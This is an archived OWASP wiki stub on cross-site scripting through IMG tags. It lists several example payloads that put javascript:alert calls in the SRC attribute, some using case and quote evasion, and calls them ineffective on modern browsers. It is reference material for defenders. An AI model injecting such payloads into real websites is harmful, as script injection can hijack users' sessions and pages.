This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit

Script in IMG tags

Revision as of 16:05, 2 April 2012 by Paul McCann (talk | contribs)

Jump to: navigation, search


It is possible for an attacker to execute Javascript code via the IMG tags. This is also refered to as XSS (Cross Site Scripting). However, this type of attack is no longer possible on modern browsers.


The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.

<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

Related Threats

Related Attacks

XSS Attacks

Related Vulnerabilities

Related Countermeasures


This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.